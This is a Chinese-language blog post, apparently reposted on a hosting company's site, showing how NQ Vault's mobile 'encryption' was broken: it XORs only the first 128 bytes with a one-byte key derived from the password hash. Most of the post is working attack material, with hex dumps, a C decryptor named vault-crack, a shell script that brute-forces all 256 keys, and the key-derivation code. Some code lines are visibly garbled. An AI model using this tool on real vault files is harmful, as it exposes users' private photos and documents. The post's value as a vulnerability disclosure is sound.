看我如何用3天时间黑掉“网秦私密空间(NQ Vault)”

什么是“网秦私密空间(NQ Vault)”

“网秦私密空间”英文名为NQ Vault,是一款手机加密APP。它允许用户设置一个隐私密码以及对照片,文本,或者其他数据进行“加密”。比如说,一个攻击者需要进入该设备查看其中内容那么他就需要获取这个隐私密码。即使攻击者从设备中拖出了这些数据也是没用的,因为这些数据都是经过加密处理的。

说起来,NQ Vault(下载地址)在谷歌商店中还有一个不错的评级呢:

1.最受欢迎的应用,在全球范围内拥有超过3000万用户

2.CTIA – Techlicious 2012,最佳CTIA奖项

3.PC Magazine – PC Magazine最近App

4.TRUSTe – 被收入“TRUSTe隐私封条”

5.全球移动互联网大会 – TOP50

另外网秦的宣传口号也不错——将你手机里的秘密全部藏起来!

在接下来的三天时间里,我将演示攻击者如何将“网秦私密空间(NQ Vault)”加密了的数据拖出,并用几秒钟读取到原始文件!

第一天

我使用GIMP做了一个1像素的图片[test.png],运行以下命令

echo NINJADOGE24 >> test.png

‍‍并且使用NQ Vault v6.1.00.22对其进行加密,密码为2424

test.png的原始文件如下:

0000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
0000010: 0000 0001 0000 0001 0802 0000 0090 7753 ..............wS
0000020: de00 0000 0970 4859 7300 0003 b100 0003 .....pHYs.......
0000030: b101 f583 ed49 0000 0007 7449 4d45 07df .....I....tIME..
0000040: 0401 0319 3a3d ca0b 0c00 0000 0c69 5458 ....:=.......iTX
0000050: 7443 6f6d 6d65 6e74 0000 0000 00bc aeb2 tComment........
0000060: 9900 0000 0f49 4441 5408 1d01 0400 fbff .....IDAT.......
0000070: 00ff 0000 0301 0100 c706 926f 0000 0000 ...........o....
0000080: 4945 4e44 ae42 6082 4e49 4e4a 4144 4f47 IEND.B`.NINJADOG
0000090: 4532 340a E24.

Vault的sqlite数据库告诉了我们应该在哪里找到加密文件

加密过后的文件,1427858907181.png:

0000000: 8d54 4a43 090e 1e0e 0404 0409 4d4c 4056  .TJC........ML@V 0000010: 0404 0405 0404 0405 0c06 0404 0494 7357  ..............sW 0000020: da04 0404 0d74 4c5d 7704 0407 b504 0407  .....tL]w....... 0000030: b505 f187 e94d 0404 0403 704d 4941 03db  .....M....pMIA.. 0000040: 0005 071d 3e39 ce0f 0804 0404 086d 505c  ....>9.......mP\ 0000050: 7047 6b69 6961 6a70 0404 0404 04b8 aab6  pGkiiajp........ 0000060: 9d04 0404 0b4d 4045 500c 1905 0004 fffb  .....M@EP....... 0000070: 04fb 0404 0705 0504 c302 966b 0404 0404  ...........k.... 0000080: 4945 4e44 ae42 6082 4e49 4e4a 4144 4f47  IEND.B`.NINJADOG 0000090: 4532 340a                                E24.

有趣的是,我本以为他会对所有内容进行加密,包括结尾的NINJADOGE24,怎么看怎么像置换加密。

接着我使用http://jdejong.net/tools/bitwisecalculator.php 工具,结果如下:

89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49                  XOR 8D 54 4A 43 09 0E 1E 0E 04 04 04 09 4D                   = 04 04 04 04 04 04 04 04 04 04 04 04 04

哇,我有没有提到过NQ Vault有几个高级版本,每年需要支付$7.99?我打赌他使用的是XOR2048增强模式进行加密。#p#

第二天

写了一个XOR加密/解密程序。

//xor.c#include <stdio.h>#include <stdlib.h>int main(int argc, char *argv[]){    FILE *file_a, *file_b;    int char_a, char_b;         file_a = fopen(argv[1], "r");    file_b = fopen(argv[2], "r");         while((char_a = getc(file_a)) != EOF && (char_b = getc(file_b)) != EOF)            putchar(char_a ^ char_b);                 fclose(file_a);    fclose(file_b);              return EXIT_SUCCESS;}

这时候使用一个1像素的jpg文件

0000000: ffd8 ffe0 0010 4a46 4946 0001 0101 0060  ......JFIF.....` 0000010: 0060 0000 ffe1 0352 4578 6966 0000 4d4d  .`.....RExif..MM 0000020: 002a 0000 0008 0005 5100 0004 0000 0001  .*......Q....... 0000030: 0000 0000 5101 0003 0000 0001 0001 0000  ....Q........... 0000040: 5102 0001 0000 0300 0000 004a 5103 0001  Q..........JQ... 0000050: 0000 0001 0000 0000 5104 0001 0000 0001  ........Q....... 0000060: fc00 0000 0000 0000 0000 0000 0033 0000  .............3.. 0000070: 6600 0099 0000 cc00 00ff 002b 0000 2b33  f..........+..+3 0000080: 002b 6600 2b99 002b cc00 2bff 0055 0000  .+f.+..+..+..U.. 0000090: 5533 0055 6600 5599 0055 cc00 55ff 0080  U3.Uf.U..U..U... 00000a0: 0000 8033 0080 6600 8099 0080 cc00 80ff  ...3..f......... 00000b0: 00aa 0000 aa33 00aa 6600 aa99 00aa cc00  .....3..f.......                      -- snip -- 0000590: bac2 c3c4 c5c6 c7c8 c9ca d2d3 d4d5 d6d7  ................ 00005a0: d8d9 dae2 e3e4 e5e6 e7e8 e9ea f2f3 f4f5  ................ 00005b0: f6f7 f8f9 faff da00 0c03 0100 0211 0311  ................ 00005c0: 003f 00f9 1e8a 28af cdcf f7b0 ffd9 4e49  .?....(.......NI 00005d0: 4e4a 4144 4f47 4532 3420 0d0a            NJADOGE24 ..

对4815162342进行加密:

0000000: 3314 332c ccdc 868a 858a cccd cdcd ccac  3.3,............ 0000010: ccac cccc 332d cf9e 89b4 a5aa cccc 8181  ....3-.......... 0000020: cce6 cccc ccc4 ccc9 9dcc ccc8 cccc cccd  ................ 0000030: cccc cccc 9dcd cccf cccc cccd cccd cccc  ................ 0000040: 9dce cccd cccc cfcc cccc cc86 9dcf cccd  ................ 0000050: cccc cccd cccc cccc 9dc8 cccd cccc cccd  ................ 0000060: 30cc cccc cccc cccc cccc cccc ccff cccc  0............... 0000070: aacc cc55 cccc 00cc cc33 cce7 cccc e7ff  ...U.....3...... 0000080: 002b 6600 2b99 002b cc00 2bff 0055 0000  .+f.+..+..+..U.. 0000090: 5533 0055 6600 5599 0055 cc00 55ff 0080  U3.Uf.U..U..U... 00000a0: 0000 8033 0080 6600 8099 0080 cc00 80ff  ...3..f......... 00000b0: 00aa 0000 aa33 00aa 6600 aa99 00aa cc00  .....3..f.......                      -- snip -- 0000590: bac2 c3c4 c5c6 c7c8 c9ca d2d3 d4d5 d6d7  ................ 00005a0: d8d9 dae2 e3e4 e5e6 e7e8 e9ea f2f3 f4f5  ................ 00005b0: f6f7 f8f9 faff da00 0c03 0100 0211 0311  ................ 00005c0: 003f 00f9 1e8a 28af cdcf f7b0 ffd9 4e49  .?....(.......NI 00005d0: 4e4a 4144 4f47 4532 3420 0d0a            NJADOGE24 ..

Key:

0000000: cccc cccc cccc cccc cccc cccc cccc cccc  ................ 0000010: cccc cccc cccc cccc cccc cccc cccc cccc  ................ 0000020: cccc cccc cccc cccc cccc cccc cccc cccc  ................ 0000030: cccc cccc cccc cccc cccc cccc cccc cccc  ................ 0000040: cccc cccc cccc cccc cccc cccc cccc cccc  ................ 0000050: cccc cccc cccc cccc cccc cccc cccc cccc  ................ 0000060: cccc cccc cccc cccc cccc cccc cccc cccc  ................ 0000070: cccc cccc cccc cccc cccc cccc cccc cccc  ................ 0000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................ 0000090: 0000 0000 0000 0000 0000 0000 0000 0000  ................ 00000a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................ 00000b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................                      -- snip -- 0000590: 0000 0000 0000 0000 0000 0000 0000 0000  ................ 00005a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................ 00005b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................ 00005c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................ 00005d0: 0000 0000 0000 0000 0000 0000 0a         .............

前面的128字节过后的内容仍然保持原样。这绝对是史上最棒的加密方法了!

我们尝试使用001,002,003这类密码,看看有没有什么发现。

password    key 000         30 001         31 002         32 003         33 004         34 .............. 010         4f 011         50 012         51 .............. 2424        04 4815162342  cc

好吧,我承认现在开始我有一点兴趣了。因为密码为009之后,整个规律似乎已经对不起来了。

不管怎么说,尝试重建generateKey(password)都是毫无意义的。

我预感我会使用暴力破解,从00到ff(也就是0~255)直到我得到一个有效文件。#p#

第三天

我即兴写的XOR加密/解密程序,修改一下:

// vault-crack.c#include <stdio.h>#include <stdlib.h>int main(int argc, char *argv[]){    FILE *file_a;    int char_a, char_b = strtol(argv[2], NULL, 10), i = 0;         file_a = fopen(argv[1], "r");         while((char_a = getc(file_a)) != EOF)         {             if(< 128) putchar(char_a ^ char_b) && i++;        else putchar(char_a);    }         fclose(file_a);              return EXIT_SUCCESS;}

暴力破解没有想象中那么困难

#!/bin/sh for i in `seq 0 255`; do     ./vault-crack $1 $i > $1.decrypted         if [ `file $1.decrypted --brief --mime-type` != "application/octet-stream" ]         then         echo "Key = $i" && exit     fi done

编译vault-crack.c,将这个脚本与使用vault加密的文件放入同一个目录下,最后使用如下命令对文件进行解密

./vault-crack.sh ENCRYPTED_FILE

大功告成!

更新

bkerler以及phaeilo指出生成密钥的关键代码如下:

key = password.hashCode() & 0xff;

hashCode功能是由Java定义的:

static int hashCode(String password){    int h = 0;    for (int i = 0; i < password.length(); i++)    {        h = 31*+ password.charAt(i);    }         return h;}

但是key仍然需要进行暴力破解,因为解密文件并不知道密码。

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/146284.html<

(0)
运维的头像运维
上一篇2025-03-11 00:43
下一篇 2025-03-11 00:44

相关推荐

  • 个人主题怎么制作?

    制作个人主题是一个将个人风格、兴趣或专业领域转化为视觉化或结构化内容的过程,无论是用于个人博客、作品集、社交媒体账号还是品牌形象,核心都是围绕“个人特色”展开,以下从定位、内容规划、视觉设计、技术实现四个维度,详细拆解制作个人主题的完整流程,明确主题定位:找到个人特色的核心主题定位是所有工作的起点,需要先回答……

    2025-11-20
    0
  • 社群营销管理关键是什么?

    社群营销的核心在于通过建立有温度、有价值、有归属感的社群,实现用户留存、转化和品牌传播,其管理需贯穿“目标定位-内容运营-用户互动-数据驱动-风险控制”全流程,以下从五个维度展开详细说明:明确社群定位与目标社群管理的首要任务是精准定位,需明确社群的核心价值(如行业交流、产品使用指导、兴趣分享等)、目标用户画像……

    2025-11-20
    0
  • 香港公司网站备案需要什么材料?

    香港公司进行网站备案是一个涉及多部门协调、流程相对严谨的过程,尤其需兼顾中国内地与香港两地的监管要求,由于香港公司注册地与中国内地不同,其网站若主要服务内地用户或使用内地服务器,需根据服务器位置、网站内容性质等,选择对应的备案路径(如工信部ICP备案或公安备案),以下从备案主体资格、流程步骤、材料准备、注意事项……

    2025-11-20
    0
  • 如何企业上云推广

    企业上云已成为数字化转型的核心战略,但推广过程中需结合行业特性、企业痛点与市场需求,构建系统性、多维度的推广体系,以下从市场定位、策略设计、执行落地及效果优化四个维度,详细拆解企业上云推广的实践路径,精准定位:明确目标企业与核心价值企业上云并非“一刀切”的方案,需先锁定目标客户群体,提炼差异化价值主张,客户分层……

    2025-11-20
    0
  • PS设计搜索框的实用技巧有哪些?

    在PS中设计一个美观且功能性的搜索框需要结合创意构思、视觉设计和用户体验考量,以下从设计思路、制作步骤、细节优化及交互预览等方面详细说明,帮助打造符合需求的搜索框,设计前的规划明确使用场景:根据网站或APP的整体风格确定搜索框的调性,例如极简风适合细线条和纯色,科技感适合渐变和发光效果,电商类则可能需要突出搜索……

    2025-11-20
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注